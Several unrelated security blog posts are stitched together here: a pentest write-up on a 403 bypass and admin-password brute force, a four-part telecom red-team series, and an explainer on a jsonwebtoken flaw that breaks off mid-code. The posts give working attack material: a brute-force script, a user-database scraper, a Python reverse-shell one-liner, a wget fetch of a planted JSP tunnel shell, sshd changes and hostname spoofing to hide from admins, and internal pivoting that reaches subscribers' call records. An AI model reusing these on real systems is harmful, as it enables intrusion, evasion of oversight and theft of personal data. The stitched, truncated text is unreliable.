Today we’ll look at one of the external penetration tests that I carried out earlier this year. Due to the confidentiality agreement, we will use the usual domain of REDACTED.COM
So, to provide a bit of context: the test is completely black box, with zero information provided by the customer. The only thing we know is that we are allowed to test redacted.com and the subdomain my.redacted.com.
I’ll skip through the whole passive information gathering process and will get straight to the point.
I start actively scanning and navigating through the website to discover potential entry points. There are no ports open other than 80 & 443.
So, I start directory bruteforcing with gobuster and straightaway, I see an admin panel that returns a 403 — Forbidden response.
[Screenshot: gobuster directory brute force output]
Seeing this, we navigate to the website to verify that it is indeed a 403 and to capture the request with Burp Suite for potential bypasses.
[Screenshot: the admin panel returning 403 Forbidden]
In my mind, I was thinking it would be impossible to bypass this, assuming an ACL that allows only internal IP addresses. Nevertheless, I tried the following to bypass the 403:
HTTP Methods fuzzing (GET, POST, TRACE, HEAD etc.)
Path fuzzing/force browsing (https://redacted.com/admin/index.html, https://redacted.com/admin/./index.html and more)
Protocol version switching (e.g., downgrading from HTTP/2 to HTTP/1.1)
String terminators (%00, 0x00, //, ;, %, !, ?, [] etc.) — adding those to the end of the path and inside the path
Long story short, none of those methods worked. Then I remembered that security controls are sometimes built around the literal spelling and case of components within a request, so I tried the 'case switching' technique. It probably sounds dumb, but it actually worked!
To sum it up:
https://redacted.com/admin -> 403 Forbidden
https://redacted.com/Admin -> 200 OK
https://redacted.com/aDmin -> 200 OK
Switching any letter to uppercase bypasses the restriction.
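For future engagements, this check is trivial to automate. A minimal sketch in Python (assuming the requests library; the URL and path mirror this test):

import requests

BASE = "https://redacted.com"
PATH = "admin"

# Try every single-letter case switch of /admin and report anything not 403.
for i in range(len(PATH)):
    candidate = PATH[:i] + PATH[i].upper() + PATH[i+1:]
    r = requests.get(f"{BASE}/{candidate}", allow_redirects=False)
    if r.status_code != 403:
        print(f"/{candidate} -> {r.status_code}")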
Voila! We get a login page to the admin panel.
[Screenshot: the admin panel after the 403 bypass]
We get lucky with this one. Nevertheless, we are now able to try different attacks (password spraying, brute forcing, etc.). The company we are testing isn't small, and we had collected quite a large number of employee credentials from leaked databases (LeakCheck, LeakPeek, and others). However, this is the admin panel, so we go with the usual tests:
See if there is username enumeration
See if there are any login restrictions
Check for possible WAF that will block us due to number of requests
To keep it short: we are unable to enumerate usernames, but there is also no rate limiting of any sort.
Considering the above, we load rockyou.txt and start brute forcing the password of the ‘admin’ account. After a few thousand attempts, we see the below:
[Screenshot: brute forcing the admin panel with Burp Suite]
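We drove the attack from Burp Intruder, but the same thing is a few lines of Python. A rough sketch (the endpoint, form fields, and failure marker are assumptions, not the real panel's):

import requests

URL = "https://redacted.com/Admin/login"  # hypothetical login endpoint

with open("rockyou.txt", encoding="latin-1") as wordlist:
    for line in wordlist:
        password = line.strip()
        r = requests.post(URL, data={"username": "admin", "password": password})
        if "Invalid credentials" not in r.text:  # assumed failure marker
            print(f"Possible hit: admin:{password}")
            break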
We found valid credentials for the admin account. Navigate to the website’s admin panel, authenticate and we are in!
[Screenshot: successful authentication to the admin panel]
Now that we are in, there isn't much more that we need to do, or can do without the consent of the customer. The admin panel grants administrative control over the whole configuration: the users and their attributes, the website's pages, everything really. So, I decided to write a Python script that scrapes the whole database of users (around 39,300 records), containing their names, emails, phones, and addresses. The point of collecting those details is to present them to the client (victim) to show the seriousness of the exploited vulnerabilities. Due to the severity of these security weaknesses, we wrote a report for these specific issues the same day, and they were fixed within 24 hours.
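The scraper itself was nothing fancy. A sketch of the idea (the endpoint, cookie, pagination, and field names here are hypothetical placeholders, not the client's real API):

import csv
import requests

session = requests.Session()
session.cookies.set("session", "<authenticated admin session cookie>")

with open("users.csv", "w", newline="") as f:
    writer = csv.writer(f)
    writer.writerow(["name", "email", "phone", "address"])
    page = 1
    while True:
        r = session.get("https://redacted.com/Admin/api/users", params={"page": page})
        users = r.json()
        if not users:  # stop when a page comes back empty
            break
        for u in users:
            writer.writerow([u["name"], u["email"], u["phone"], u["address"]])
        page += 1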
Ultimately, there wasn't anything too difficult in the whole exploitation process, but the unusual 403 bypass was something I saw for the first time, and I thought some of you might weaponize it or add it to your future 403 bypass checklists.
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company's Network Monitoring System (NMS). Solved a reverse shell problem by tunneling SSH over HTTP, and went full-on ninja doing it. Proxied inside the network for internal scans. Got access to CDRs and the VLR via an SS7 application.
Hi everyone, this is my first post on Medium and I hope you guys enjoy reading it! There is a lot of information that I had to redact because of the sensitive nature of this info. (I’m apologizing in advance 😅 )
Introduction
So there I was, doing a Red Team Engagement for a client a while back. I was asked to get inside the network and reach the Call Detail Records (CDRs) of the telecom network. For people who don't know what a CDR is, here's a good explanation (shamelessly copied from Wikipedia):
A call detail record (CDR) is a data record produced by a telephone exchange or other telecommunications equipment that documents the details of a telephone call or other telecommunications transaction (e.g., text message) that passes through that facility or device. The record contains various attributes of the call, such as time, duration, completion status, source number, and destination number.
Among all my engagements, this one holds a special place. Getting the initial foothold was way too easy (simple network service exploitation leading to RCE), but the real issue was getting a stable shell.
In this blog post (not a tutorial), I want to share my experience on how I went from a Remote Code Execution (RCE) to proxified internal network scans in a matter of minutes.
Reconnaissance
Every ethical hacker/penetration tester/bug bounty hunter/red teamer knows the importance of reconnaissance. The phrase "give me six hours to chop down a tree and I will spend the first four sharpening the axe" fits perfectly here. The more extensive the reconnaissance, the better the odds of exploitation.
So for the RTE, the obvious choices for recon were: DNS enumeration, ASN & BGP lookups, passive recon via multiple search engines, checking source-code repositories such as GitHub, BitBucket, GitLab, etc. for something juicy, and doing some OSINT on employees for spear phishing in case no RCE was found. (Trust me when I say this: fooling an employee into downloading and executing a malicious document is easy, but only if you can get past the obstacles: AVs and email spam filters.)
There are just so many sources from where you can recon for a particular organization. In my case, I started off with the DNS enumeration itself.
Fun fact: The wordlist I used has 2.77 million unique DNS records.
Most bounty hunters will only look at ports 80 or 443 on the subdomains they find. The thing is, sometimes it's better to perform a full port scan just to be on the safe side. In my case, I found the subdomain e[REDACTED]-nms.[REDACTED].com.[REDACTED], and a full port scan returned some interesting results.
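For reference, a full TCP port scan with service detection is along these lines (flags to taste):

nmap -p- -sV -T4 e[REDACTED]-nms.[REDACTED].com.[REDACTED]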
The ports 12000/tcp and 14000/tcp were nothing special, but as for 14100/tcp, let's just say this was my lucky day!!
J-Fuggin-Boss!!
Remote Code Execution
From here on, everyone who has exploited the infamous JBoss vulnerabilities before knows how things will move forward. For newbies who haven't had experience with JBoss exploitation, the following links will help you out:
For JBoss exploitation, you can use JexBoss. The tool includes many exploitation methods and techniques, covering application and servlet deserialization as well as Struts2. You can exploit JBoss using Metasploit too, though I prefer JexBoss.
Continuing with the engagement, once I discovered JBoss, I quickly fired up Jexboss for the exploitation. The tool was easy to use.
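As far as I recall the JexBoss README, firing it at a target is a one-liner (verify the syntax against the repo):

python jexboss.py -host https://e[REDACTED]-nms.[REDACTED].com.[REDACTED]:14100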
As we can see from the above screenshot, the server was vulnerable. Using the JMXInvokerServlet method, I was able to get Remote Code Execution on the server. Pretty straightforward exploitation, right?
You must be thinking: that was no advanced-level shit, so what's different about this post?
Patience guys!
Now that I had the foothold, the actual issue arose. As always, once I had the RCE, I tried getting a reverse shell.
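For reference, this is the kind of one-liner I mean, the classic Python reverse shell (listener IP and port are placeholders):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'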
And I even got a back connection!
However, the shell was not stable: the Python process was getting killed after a few seconds. I tried other reverse shell one-liner payloads, different common ports, even UDP, but the result was the same. I also tried reverse_tcp/http/https Metasploit payloads in different forms to get Meterpreter connections, but those shells too disconnected after a few seconds.
I have experienced situations like this before, and I always asked myself: if I can't get a reverse shell, how will I proceed?
Enter the bind shell over an HTTP tunnel!
How I hacked into a Telecom Network — Part 2 (Playing with Tunnels: TCP Tunneling)
Recap: Red Team Engagement for a telecom company. Found an interesting subdomain, did a full port scan on it, found ports 12000/tcp, 14000/tcp, and 14100/tcp with a running instance of JBoss (lucky me!), exploited JBoss for RCE, and then ran into issues with the reverse shell.
My attempts at a stable reverse shell had failed. The other idea that came to mind was a bind shell instead of a reverse shell over HTTP: getting SSH over HTTP (a TCP tunnel over HTTP) for stability. But what exactly was I achieving here?
TCP tunnel over HTTP (for TCP stability) + stealthy SSH connection (over the TCP tunnel created) + SOCKS tunnel (dynamic SSH tunnel) for internal network scanning with Metasploit = exploitation of internal network services and data exfiltration via these recursive tunnels.
Looks very complex? Let’s break it down into multiple steps:
First, I created a bridge between my server and the NMS server so that it would support communication over protocols other than just HTTP/HTTPS (>L2 for now) [a TCP tunnel over HTTP]
Once the bridge (the TCP tunnel over HTTP) was created, I configured SSH port forwarding from my server (2222/tcp) to the NMS server (22/tcp) so that I could connect to the NMS server via SSH over HTTP (SSH over TCP over HTTP, to be precise). Note: the SSH service on the NMS server was listening on 127.0.0.1.
I then configured the NMS SSH server to allow root login and generated an SSH key pair (copying my public key into the authorized_keys file) for access to the NMS server via SSH.
I checked the SSH connection to the NMS using the private key, and once it worked, I created a dynamic SSH tunnel (SOCKS) to proxy Metasploit over the SSH tunnel (Metasploit over SSH over TCP over HTTP, to be precise).
I want to walk through, step by step, how I created the tunnels and the way I played with them.
Tunneling 101
A tunneling protocol is a communications protocol that allows for the movement of data from one network to another. It involves allowing private network communications to be sent across a public network (such as the Internet) through a process called encapsulation. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, it can hide the nature of the traffic that is run through a tunnel.
The tunneling protocol works by using the data portion of a packet (the payload) to carry the packets that actually provide the service. Tunneling uses a layered protocol model such as those of the OSI or TCP/IP protocol suite, but usually violates the layering when using the payload to carry a service not normally provided by the network. Typically, the delivery protocol operates at an equal or higher level in the layered model than the payload protocol.
Source: Wikipedia
So basically the idea is to use the webserver as an intermediate proxy to forward all the network packets (TCP packets) from the webserver to the internal network.
[Diagram: forwarding TCP packets to the internal network through the web server using HTTP]
TCP tunneling can help you in situations where you have restricted port access and filtered egress traffic. In my case, there was not much filtering however, I used this technique to get stable shell access.
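To make the encapsulation concrete, here is a toy sketch of the web-server half of such a tunnel in Python. This is an illustration of the idea, not ABPTTS itself: a real tool also encrypts and encodes payloads, multiplexes many sessions, and polls continuously.

import socket
from http.server import BaseHTTPRequestHandler, HTTPServer

TARGET = ("127.0.0.1", 22)  # internal service the web server relays to (assumption)
sessions = {}               # session id -> open TCP socket to TARGET

class TunnelHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        sid = self.headers.get("X-Session", "default")
        if sid not in sessions:
            sock = socket.create_connection(TARGET, timeout=5)
            sock.settimeout(1.0)
            sessions[sid] = sock
        sock = sessions[sid]
        length = int(self.headers.get("Content-Length", "0"))
        if length:
            sock.sendall(self.rfile.read(length))  # TCP payload rides in the HTTP body
        try:
            reply = sock.recv(65536)               # whatever the service sent back
        except socket.timeout:
            reply = b""
        self.send_response(200)
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)                    # returned inside the HTTP response

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), TunnelHandler).serve_forever()

The client half does the mirror image: it listens on a local TCP port and wraps everything it receives into POST bodies sent to this handler.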
I already had RCE on the server, and with 'root' privileges at that. I quickly used this opportunity to create a JSP-based shell using ABPTTS.
A Black Path Toward The Sun (ABPTTS)
As explained in the GitHub repo,
ABPTTS uses a Python client script and a web application server page/package to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server.
Currently, only JSP/WAR and ASP.NET server-side components are supported by this tool.
So the idea was to create a JSP-based shell using ABPTTS, upload it to the web server, let the tool connect to the JSP shell, and create a TCP tunnel over HTTP carrying a secure shell (SSH) between my system and the server.
python abpttsfactory.py -o jexws4.jsp
When the shell got generated using ABPTTS, the tool created a configuration file to be used for creating the TCP tunnel over HTTP/HTTPS.
I then uploaded the JSP shell to the server using wget. Note: the jexws4.war shell is a package from JexBoss. When you exploit a JBoss vulnerability via JexBoss, the tool uploads its own WAR shell to the server. In my case, I just located that WAR/JSP shell (jexws4.jsp) and replaced it with the ABPTTS shell:
wget http://[MY SERVER]/jexws4.jsp -O <location of jexws4.jsp shell on NMS server>
Once the ABPTTS shell was uploaded to the server, I quickly confirmed it in JexBoss by executing a random command and checking the output. Why? With the JexBoss shell overwritten by the ABPTTS shell, whatever command I executed, the output would always be the hash printed by the ABPTTS shell.
As you can see from the above screenshot, when I executed the 'id' command, I got a weird hash in return, which proves the ABPTTS shell was uploaded successfully!
Now that I had a TCP tunnel over HTTP configured, the next thing I wanted was to forward the SSH port running on the server (22/tcp on the NMS) and bind it to a port on my system (2222/tcp). Why? So that I could connect to the NMS via SSH. Did you notice what I was trying to do here?
[Diagram: SSH port forwarding (not yet tunneled) via the TCP tunnel over HTTP]
I had yet to configure the SSH part on the NMS and on my own server for the SSH tunnel. For now, I just prepared the port-forwarding mechanism so that I could reach local port 22/tcp on the NMS from my server via port 2222/tcp.
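On my side, the forward is a single abpttsclient command. As far as I recall the ABPTTS README, the syntax is along these lines (URL and paths are placeholders; verify against the repo):

python abpttsclient.py -c <ABPTTS config file> -u "https://[TARGET]/<path to the ABPTTS JSP shell>" -f 127.0.0.1:2222/127.0.0.1:22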
I checked my connections table to verify that the port was properly forwarded. As you can see in the below screenshot, my server's port 2222/tcp was in the LISTEN state.
The next thing to do was to configure the SSH server, connect to the NMS, and start a dynamic SSH tunnel (SOCKS). I'll cover this in the next post:
How I hacked into a Telecom Network — Part 3 (Playing with Tunnels: Stealthy SSH & Dynamic Tunnels)
Recap: Red Team Engagement for a telecom company. Found an interesting subdomain, did a full port scan on it, found ports 12000/tcp, 14000/tcp, and 14100/tcp with a running instance of JBoss (lucky me!), exploited JBoss for RCE, and implemented a TCP tunnel over HTTP for shell stability.
DISCLAIMER: This post is quite lengthy, so just sit back, be patient, and enjoy the ride!
In the previous part, I described how I configured a TCP tunnel over HTTP and SSH port forwarding to access port 22/tcp of the NMS server from my server via port 2222/tcp. In this blog post, I'll show how I implemented dynamic SSH tunnels for further network exploitation.
Stealthy SSH Access
When you’re connected to an SSH server, the connection details are saved in a log file. To check these connection details, you can execute the ‘w’ command in *nix systems.
The command w on many Unix-like operating systems provides a quick summary of every user logged into a computer, what each user is currently doing, and what load all the activity is imposing on the computer itself. The command is a one-command combination of several other Unix programs: who, uptime, and ps -a. Source: Wikipedia
So basically, the source IP is saved, which is dangerous for a red teamer. As this was an RTE, I could not take the chance of letting the admin learn my C2 location. (Don't worry, the ABPTTS shell was connected from my server, and I had already bought a domain for IDN homograph attacks to reduce my chances of detection.)
For the stealthy connection to work, I checked the hosts file to gather more information and I found that this server is being used quite heavily inside the network.
Such a server would already be monitored, so I was thinking of ways to be as stealthy as possible in this scenario. The NMS was already monitoring the network, so I figured it must also be monitoring itself, including all network connections to/from the server. This meant I couldn't run a normal port scan through the TCP tunnel over HTTP.
How about encrypting the communication between my server and the NMS server using SSH? But with an SSH connection, my hostname/IP would be stored in the log files, and the username would be easy to identify.
In this case, my server's username was 'harry', and generating a key for this user to store in the authorized_keys file was not a good option.
And then I came up with an idea (in steps):
Create the user ‘nms’ (this user was already created in the NMS server) on my server.
Change my server’s hostname from OPENVPN to [REDACTED]_NMS[REDACTED]. (the same as the NMS server)
Generate SSH keys for the 'nms' user on my server and copy the public key into the NMS server's authorized_keys file.
Configure the SSH server running on the NMS to enable root login (PermitRootLogin), TCP port forwarding, and gateway ports (the SSH -g switch, just in case).
Configure the NMS server to act as a SOCKS proxy for my further network exploitation. (Dynamic SSH Tunnel)
The SOCKS tunnel is encrypted now and I can use this tunnel to do an internal network scan using Metasploit.
Implementation time!
I began by first adding the user ‘nms’ on my server so that I could generate the user-specific SSH keys.
I even changed my server's hostname from OPENVPN to [REDACTED]_NMS[REDACTED] (the exact same as the NMS server's), so that when I logged in via SSH, the logs would show a user login entry as nms@[REDACTED]_NMS[REDACTED]
Next, I generated the SSH Keys for ‘nms’ user on my server.
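Roughly, that housekeeping on my server looked like this (exact commands assumed; any equivalents do the job):

useradd -m nms
hostnamectl set-hostname [REDACTED]_NMS[REDACTED]
su - nms -c "ssh-keygen -t rsa -b 4096"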
I also had to change the SSH configuration on the NMS server, so I downloaded the sshd_config file from the server and changed a few things.
AllowTcpForwarding: This option enables TCP port forwarding via SSH.
GatewayPorts: This option allows remotely forwarded ports to bind to interfaces other than loopback. (I enabled this just in case I wanted a reverse shell from other internal systems to land on this server and be forwarded on to me via reverse port forwarding.)
PermitRootLogin: This option permits the client to connect to the SSH server as 'root'.
StrictModes: This option specifies whether SSH should check the user’s permissions in their home directory before accepting login.
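Put together, the relevant sshd_config lines were along these lines (a sketch; the values follow the list above):

PermitRootLogin yes
AllowTcpForwarding yes
GatewayPorts yes
StrictModes no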
Now that the configuration was done, I quickly uploaded (more like overwrote) the sshd_config file on the NMS server.
And I also copied the SSH public key to ‘root’ user’s authorized_keys file
After everything was set, I tried a test connection just to check whether I could SSH into the NMS server as 'root'!
Booyah! 😎😎😎
[Screenshot: SSH over TCP over HTTP (SSH port forwarding over the TCP tunnel created over HTTP via the ABPTTS JSP shell)]
Dynamic port forwarding (DPF) is an on-demand method of traversing a firewall or NAT through the use of firewall pinholes. The goal is to enable clients to connect securely to a trusted server that acts as an intermediary for the purpose of sending/receiving data to one or many destination servers.
DPF can be implemented by setting up a local application, such as SSH, as a SOCKS proxy server, which can be used to process data transmissions through the network or over the Internet.
Once the connection is established, DPF can be used to provide additional security for a user connected to an untrusted network. Since data must pass through the secure tunnel to another server before being forwarded to its original destination, the user is protected from packet sniffing that may occur on the LAN.
So all I had to do was create a dynamic SSH tunnel so that the NMS server would act as a SOCKS proxy server. Some of the benefits of using a SOCKS tunnel:
Got indirect access to other network devices/servers through the NMS server (NMS server becomes the gateway for me)
Because of the dynamic SSH tunnel, all the traffic between my server and the NMS server was encrypted (it used an SSH connection, remember?)
Even if a server admin sits on the NMS server and monitors the network, he won’t be able to exactly find the root cause right away. (A dedicated one would definitely join the dots)
The connection was stable (thanks to HTTP keep-alive), and all these recursive tunnels ran smoothly without any connection drops because of the TCP tunnel implemented over HTTP.
When I logged in to the NMS server over SSH, here’s what the ‘w’ command showed me:
Now all I had to do was create the SOCKS tunnel and which I did using the command: ssh -NfCq -D 9090 -i <private key/identity file> <user@host> -p <ssh custom port>
The ‘PermitRootLogin’ was changed in sshd_config file for this purpose (to log in to the NMS server as root).
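With the values from this setup plugged in, that comes out roughly as (key path assumed):

ssh -NfCq -D 9090 -i ~/.ssh/id_rsa root@127.0.0.1 -p 2222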
Worried about what the server admin would think of this setup? Generally, when SSH connections are opened, the admin sometimes checks the username that logged in and the authorized keys that were used, but most of the time he checks the hostname/IP from which the connection was initiated.
In my case, I initiated the connection from my server, where the source address was 127.0.0.1, using port 2222/tcp (thanks to the TCP tunnel over HTTP), to the NMS server with a destination address of 127.0.0.1 (again!). Because of this setup, all the admin would see is a connection initiated by the NMS server to the NMS server's SSH, using the authorized key (the public key) stored for the user 'nms' (that's why I created the same user on my host to generate the keys). And even if the admin checked the known_hosts file, all he would see is the 'nms@[REDACTED]_NMS[REDACTED]' user connected to SSH from 127.0.0.1, which was already a user profile on the NMS server.
To confirm the SOCKS tunnel, I checked the connection table on my server and port 9090/tcp was in the LISTEN state.
Awesome! The SOCKS Tunnel is ready!
All that was left was to use the SOCKS tunnel with Metasploit for further network exploitation, which I'll cover in the next post (the final part):
Pro Tip!
When you connect to a server over SSH, a pseudo-TTY is automatically allocated. Of course, this doesn't happen when you're executing one-liner commands via SSH. So whenever you want to tunnel through SSH or create a SOCKS tunnel, use the -T switch to disable pseudo-TTY allocation. You can also use the commands below:
ssh -NTfCq -L <local port forwarding> <user@host>
ssh -NTfCq -D <Dynamic port forwarding> <user@host>
To check all the SSH switches, refer to the SSH manual (HIGHLY RECOMMENDED!). When creating a tunnel with the switches shown above, you get a tunnel without a TTY allocation, and the tunneled port will work just fine!
How I hacked into a Telecom Network — Part 4 (Getting Access to CDRs, SS7 applications & VLRs)
Recap: Red Team Engagement for a telecom company. Found an interesting subdomain running JBoss, exploited JBoss for RCE, implemented a TCP tunnel over HTTP for shell stability, and set up stealthy SSH access with a dynamic SSH (SOCKS) tunnel.
In the previous part (Playing with Tunnels: Stealthy SSH & Dynamic SSH Tunnels), I described the steps I followed to create SSH tunnels with stealthy SSH access from my server via port 2222/tcp. In this blog post, I'll show how I used the SOCKS tunnel for internal network reconnaissance and to exploit internal servers, getting access to the CDRs stored on one of them.
Situational Awareness (Internal Network)
During the engagement, I was able to create a Dynamic SSH tunnel via TCP tunnel over HTTP, and believe me when I say this, the shell was neat!
Moving forward, I configured the SOCKS tunnel on port 9090/tcp and set up proxychains for Nmap scans.
That said, I prefer Metasploit over Nmap here, as it gave me more coverage and let me manage the internal IP scans easily. To proxy all modules, I used the 'setg Proxies socks4:127.0.0.1:9090' command (setting the Proxies option globally). I was looking for internal web servers, so I used the auxiliary/scanner/http/http_version module.
Because of setg, the Proxies option was already set; all I needed to do was give the IP subnet range and run the module.
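Schematically, the msfconsole session looked like this (the subnet is a placeholder):

setg Proxies socks4:127.0.0.1:9090
use auxiliary/scanner/http/http_version
set RHOSTS 10.x.x.0/24
set THREADS 10
run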
I found some Remote Management Controllers (iRMC), some SAN switches (switchExplorer.html), and a JBoss Instance …
There’s another JBoss instance used internally? 🤣
Exploiting Internal Network Service
So there was another JBoss instance, running on port 80/tcp on an internal IP 10.x.x.x. All I had to do was use proxychains and run JexBoss once more against the internal IP (I could also have used the -P switch in JexBoss to provide the proxy address).
This was an easy win: the internal JBoss server was also vulnerable, so I was able to get RCE from my pivot machine (the initial foothold) on the next internal JBoss server 😎
Awesome! Once I had the shell, I used the following command to list all the files and directories under /home/<user> in a structured way:
cd /home/<user> && find . -print | sed -e 's;[^/]*/;|____;g;s;____|; |;g'
In the output, I found an interesting .bat file: ss7-cli.bat (the script configures the SS7 Management Shell bootstrap environment).
In the same Internal JBoss server, a Visitor Location Register (VLR) console client application was also stored to access the VLR information from the database.
To monitor the SS7/ISDN links and decode the protocol standards and generate CDRs for billing purposes, a console client is required that will interact with the system.
You may ask why there was an SS7 client application running on JBoss. One word: 'Mobicents'.
Mobicents
Mobicents is an Open Source VoIP Platform written in Java to help create, deploy, manage services and applications integrating voice, video, and data across a range of IP and legacy communications networks. Source: Wikipedia
Mobicents enables the composition of Service Building Blocks (SBB) such as call control, billing, user provisioning, administration, and presence-sensitive features. This makes Mobicents servers an easy choice for telecom Operations Support Systems (OSS) and Network Management Systems (NMS). Source: design.jboss.org
So it looks like the internal JBoss server was running a VoIP gateway application (a SIP server) that interacts with the Public Switched Telephone Network (PSTN) using SS7. (Working out the internal network structure without any kind of architecture diagram was tiring.)
Going beyond
While doing some more recon on the internal JBoss application running the VoIP gateway, I found internal gateway servers, CDR backup databases, FTP servers storing backup configurations of the SS7 and USSD protocols, etc. (thanks to /etc/hosts).
From the hosts file, I found a lot of FTP servers, which at first didn't seem important, but then I found the CDR-S and CDR-L FTP servers. These servers were storing backups of the CDR S-Records and CDR L-Records respectively.
You can read more about these records from here: CDR S-Records: Page 157 & CDR L-Records: Page 168
Using Metasploit, I quickly scanned these FTP servers and checked their authentication status.
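Metasploit's anonymous FTP scanner makes that check trivial (hosts are placeholders):

use auxiliary/scanner/ftp/anonymous
set RHOSTS 10.x.x.0/24
run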
The FTP servers were accessible without any kind of authentication 🤣🤣
Maybe the FTP servers were used for internal use by VoIP applications or something else but still, a win is a win!
Due to this, I was able to get to the CDR backups, stored in XLS format, for almost all the mobile subscribers. (Sorry, but I had to redact a lot, as this is really critical information.)
In the screenshot, the A Number is the number the call originated from (the caller) and the B Number is the dialed number. The CDR records also included the IMSI & IMEI numbers, call start/end date & timestamp, call duration, call type (incoming or outgoing), service type (the telecom service company), Cell ID-A (the cell tower from which the call originated), and Location-A (the location of the caller).
Once our team notified the client about our access to the CDR backup servers, the client asked us to end the engagement there. I guess it was too much for them to take 🤣
I hope you guys enjoyed it!
Promotion Time!
If you guys want to learn more about the techniques I used and the basic concepts behind it, you can read my books (co-authored with @himanshu_hax)
JWT is short for JSON Web Token, where JSON itself is short for JavaScript Object Notation.
JSON is a modernish way of representing structured data; its format is a bit like XML, and can often be used instead, but without all the opening-and-closing angle brackets to get in the way of legibility.
For example, data that might be recorded like this in XML…
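(The record below is an arbitrary stand-in; any data works.)

<data>
  <vendor>Sophos</vendor>
  <topic>JWT</topic>
</data>

…might be recorded like this in JSON:

{"vendor": "Sophos", "topic": "JWT"}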
Whether the JSON really is easier to read than the XML is an open question, but the big idea of JSON is that because the data is encoded as legal JavaScript source, albeit without any directly or indirectly executable code in it, you can parse and process it using your existing JavaScript engine, like this:
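(A stand-in snippet; the object and its field name are assumed:)

> console.log(JSON.parse('{"vendor":"Sophos"}').vendor)
Sophos
undefined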
The output string undefined above merely reflects the fact that console.log() is a procedure – a function that does some work but doesn’t return a value. The word Sophos is printed out as a side-effect of calling the function, while undefined denotes what the function calculated and sent back: nothing.
The popularity of JavaScript for both in-browser and server-side programming, plus the visual familiarity of JSON to JavaScript coders, means that JSON is widely used these days, especially when exchanging structured data between web clients and servers.
And one popular use of JSON is the JWT system, which isn't (officially, at any rate) read aloud as juh-witt, as it is written, but peculiarly pronounced jot: an English word that refers to the little dot we write above an i or j, and, by extension, to a tiny but potentially important detail.
Authenticate strongly, then get a temporary token
Loosely speaking, a JWT is a blob of encoded data that is used by many cloud servers as a service access token.
The idea is that you start by proving your identity to the service, for example by providing a username, password and 2FA code, and you get back a JWT.
The JWT sent back to you is a blob of base64-encoded (actually, base64url-encoded) data that includes three fields:
Which cryptographic algorithm was used in constructing the JWT.
What sort of access the JWT grants, and for how long.
A keyed cryptographic hash of the first two fields, using a secret key known only to your service provider.
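You can see all three parts by building a toy token yourself. A minimal Python sketch (the claims and the secret are made up):

import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    # JWTs use unpadded, URL-safe base64.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

header = {"alg": "HS256", "typ": "JWT"}                        # field 1: algorithm
claims = {"sub": "alice", "scope": "read", "exp": 1700000000}  # field 2: access and lifetime
secret = b"known-only-to-the-service"

signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(claims).encode())
signature = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()  # field 3: keyed hash
print(signing_input + "." + b64url(signature))  # three dot-separated base64url fields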
Once you’ve authenticated up front, you can make subsequent requests to the online service, for example to check a product price or to look up an email address in a database, simply by including the JWT in each request, using it as a sort-of temporary access card.
Clearly, if someone steals your JWT after it’s been issued, they can play it back to the relevant server, which will typically give them access instead of you…
…but JWTs don’t need to be saved to disk, usually have a limited lifetime, and are sent and received over HTTPS connections, so that they can’t (in theory at least) easily be sniffed out or stolen.
When JWTs expire, or if they are cancelled for security reasons by the server, you need to go through the full-blown authentication process again in order to re-establish your right to access the service.
But for as long as they're valid, JWTs improve performance because they avoid the need to reauthenticate fully for every online request you want to make, rather like the session cookies that are set in your browser while you're logged into a social network or a news site.
Security validation as infiltration
Well, cybersecurity news today is full of a revelation by researchers at Palo Alto that we’ve variously seen described as a “high-severity flaw” or a “critical security flaw” in a popular JWT implementation.
In theory, at least, this bug could be exploited by cybercriminals for attacks ranging from implanting unauthorised files onto a JWT server, thus maliciously modifying its configuration or modifying the code it might later use, to direct and immediate code execution inside a victim’s network.
Simply put, the act of presenting a JWT to a back-end server for validation, something that typically happens at every API call ('API call' being jargon for making a service request), could lead to malware being implanted.
But here’s the good news:
The flaw isn't intrinsic to the JWT protocol. It applies to a specific implementation of JWT called jsonwebtoken, maintained by Auth0. If you've updated from version 8.5.1 or earlier to version 9.0.0, which came out on 2022-12-21, you're now protected from this particular vulnerability.
Cybercriminals can’t directly exploit the bug simply by logging in and making API calls. As far as we can see, although an attacker could subsequently trigger the vulnerability by making remote API requests, the bug needs to be “primed” first by deliberately writing a booby-trapped secret key into your authentication server’s key-store.
According to the researchers, the bug existed in the part of Auth0’s code that validated incoming JWTs against the secret key stored centrally for that user.
As mentioned above, the JWT itself consists of two fields of data denoting your access privileges, and a third field consisting of the first two fields hashed using a secret key known only to the service you’re calling.
To validate the token, the server needs to recalculate the keyed hash of those first two JWT fields, and to confirm the hash that you presented matches the hash it just calculated.
Given that you don’t know the secret key, but you can present a hash that was computed recently using that key…
…the server can infer that you must have acquired the hash from the authentication server in the first place, by proving your identity up front in some suitable way.
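In code, the server's side of that check boils down to something like this Python sketch (not any specific library's implementation):

import base64, hashlib, hmac

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def verify(token: str, secret: bytes) -> bool:
    # Recompute the keyed hash over "header.payload" and compare in constant time.
    signing_input, _, presented = token.rpartition(".")
    expected = b64url(hmac.new(secret, signing_input.encode(), hashlib.sha256).digest())
    return hmac.compare_digest(expected, presented)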
Data type confusion
It turns out that the hash validation code in jsonwebtoken assumes (or, until recently, assumed) that the secret key for your account in the server's own authentication key-store really was a cryptographic secret key, encoded in a standard text-based format such as PEM (short for privacy enhanced mail, but mainly used for non-email purposes these days).
If you could somehow corrupt a user’s secret key by replacing it with data that wasn’t in PEM format, but that was, in fact, some other more complex sort of JavaScript data object…
…then you could booby-trap the secret-key-based hash validation calculation by tricking the authentication server into running some JavaScript code of your choice from that infiltrated “fake key”.
Simply put, the server would try to decode a secret key that it assumed was in a format it could handle safely, even if the key wasn’t in a safe format and the server couldn’t deal with it securely.
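A conceptual analogue in Python (the real bug was in the JavaScript jsonwebtoken code, but the shape is the same): a verifier that blindly stringifies whatever "key" object it is handed gives that object's own methods a chance to run.

import hashlib, hmac

def naive_verify(signing_input: bytes, presented: bytes, key) -> bool:
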